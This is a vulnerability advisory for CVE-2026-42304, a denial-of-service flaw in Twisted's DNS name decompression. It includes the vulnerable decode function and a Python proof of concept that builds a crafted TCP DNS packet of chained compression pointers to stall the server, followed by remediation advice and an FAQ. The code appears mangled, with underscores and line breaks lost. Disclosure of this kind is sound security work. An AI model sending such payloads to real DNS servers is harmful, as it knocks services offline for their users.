CVE-2026-42304: Twisted: Denial of Service (DoS) in twisted.names via Crafted DNS Compression Pointer Chains
Details
The twisted.names module is vulnerable to a Denial of Service (DoS) attack via resource exhaustion during DNS name decompression. A remote, unauthenticated attacker can exploit this by sending a crafted TCP DNS packet containing deeply chained compression pointers. This flaw bypasses previous loop-prevention logic, causing the single-threaded Twisted reactor to hang while processing millions of recursive lookups, effectively freezing the server.
---
Technical Details
The main issue is in twisted.names.dns.Name.decode. A visited set was added in 2011 (commit e11cd82) to prevent infinite loops, but there is still no limit on the number of pointer dereferences per message. Also, the visited set is reset for each Question record.
Because DNSServerFactory handles every record in QDCOUNT without checking them, an attacker can add thousands of questions that all refer to the same long chain of pointers. This makes the parser repeat a complex and unnecessary search.
python src/twisted/names/dns.py (Lines 595-631)
def decode(self, strio, length=None): visited = set() self.name = b"" off = 0 while 1: l = ord(readPrecisely(strio, 1)) if l == 0: if off > 0: strio.seek(off) return if (l >> 6) == 3: newoff = (l & 63) << 8 | ord(readPrecisely(strio, 1)) if newoff in visited: raise ValueError("Compression loop in encoded name") visited.add(newoff) if off == 0: off = strio.tell() strio.seek(newoff) continue label = readPrecisely(strio, l) if self.name == b"": self.name = label else: self.name = self.name + b"." + label
---
PoC
python import struct, time from twisted.names import dns, server from twisted.test import protohelpers
def createtcppayload(): numpointers = 8000 packetlength = 65533 numquestions = (packetlength - (numpointers 2) - 12) // 6
buffer = bytearray(packetlength)
struct.packinto("!HHHHHH", buffer, 0, 1, 0, numquestions, 0, 0, 0)
ptroffset = 12 for in range(numpointers - 1): struct.packinto("!H", buffer, ptroffset, 0xC000 | (ptroffset + 2)) ptroffset += 2
nullbyteoffset = ptroffset + 2 struct.packinto("!H", buffer, ptroffset, 0xC000 | nullbyteoffset) buffer[nullbyteoffset] = 0
questionoffset = nullbyteoffset + 1 for in range(numquestions): if questionoffset + 6 <= packetlength: struct.packinto("!HHH", buffer, questionoffset, 0xC000 | 12, 1, 1) questionoffset += 6
return packetlength, numpointers, numquestions, struct.pack("!H", packetlength) + buffer
def testdnsserver(): factory = server.DNSServerFactory(clients=[]) protocol = factory.buildProtocol(("127.0.0.1", 10053)) transport = protohelpers.StringTransport() protocol.makeConnection(transport)
pktlen, numptrs, numqs, payload = createtcppayload() print("payload") print(f"len={pktlen} ptrs={numptrs} qs={numqs}")
start = time.time() protocol.dataReceived(payload) end = time.time()
print(f"time={end - start:.4f}s")
if name == "main": testdnsserver()
---
Impact
A single malformed TCP packet is sufficient to block the Twisted reactor's event loop for several seconds. Because Twisted operates on a single-threaded cooperative multitasking model, this is a common Denial of Service (DoS). The process becomes unable to handle new connections, process I/O, or respond to existing requests, effectively paralyzing the server for the duration of the decompression.
---
Remediation
- Update twisted.names.dns.Name.decode to add a required limit on pointer resolutions per DNS message - Share the "resolved offset" state across all records in a single message to prevent redundant processing. - Validate the number of questions before entering the decoding loop in Message.decode.
---
Resources
https://cwe.mitre.org/data/definitions/400.html
https://cwe.mitre.org/data/definitions/407.html
https://datatracker.ietf.org/doc/html/rfc9267
https://github.com/twisted/twisted/blob/trunk/src/twisted/names/dns.py#L595
https://github.com/twisted/twisted/commit/e11cd82bdd79b3ebbb0e8635cbb9c76df2b5af09
---
Author: Tomas Illuminati
Other sources
Twisted is an event-based framework for internet applications, supporting Python 3.6+. Prior to 26.4.0rc2, the twisted.names module is vulnerable to a Denial of Service (DoS) attack via resource exhaustion during DNS name decompression. A remote, unauthenticated attacker can exploit this by sending a crafted TCP DNS packet containing deeply chained compression pointers. This flaw bypasses previous loop-prevention logic, causing the single-threaded Twisted reactor to hang while processing millions of recursive lookups, effectively freezing the server. This vulnerability is fixed in 26.4.0rc2.
— MITRE
Twisted: Denial of Service (DoS) in twisted.names via Crafted DNS Compression Pointer Chains
— Microsoft
Affected Software
Event History
Frequently Asked Questions
What is the severity of CVE-2026-42304?
CVE-2026-42304 is classified as a Denial of Service vulnerability due to resource exhaustion during DNS name decompression.
How do I fix CVE-2026-42304?
To mitigate CVE-2026-42304, upgrade to Twisted version 26.4.0rc2 or later.
What types of attacks can exploit CVE-2026-42304?
CVE-2026-42304 can be exploited through a remote, unauthenticated Denial of Service attack using crafted TCP DNS packets.
Which software is affected by CVE-2026-42304?
CVE-2026-42304 affects the Twisted package versions up to 25.5.0.
Can CVE-2026-42304 be exploited without authentication?
Yes, CVE-2026-42304 can be exploited by a remote, unauthenticated attacker.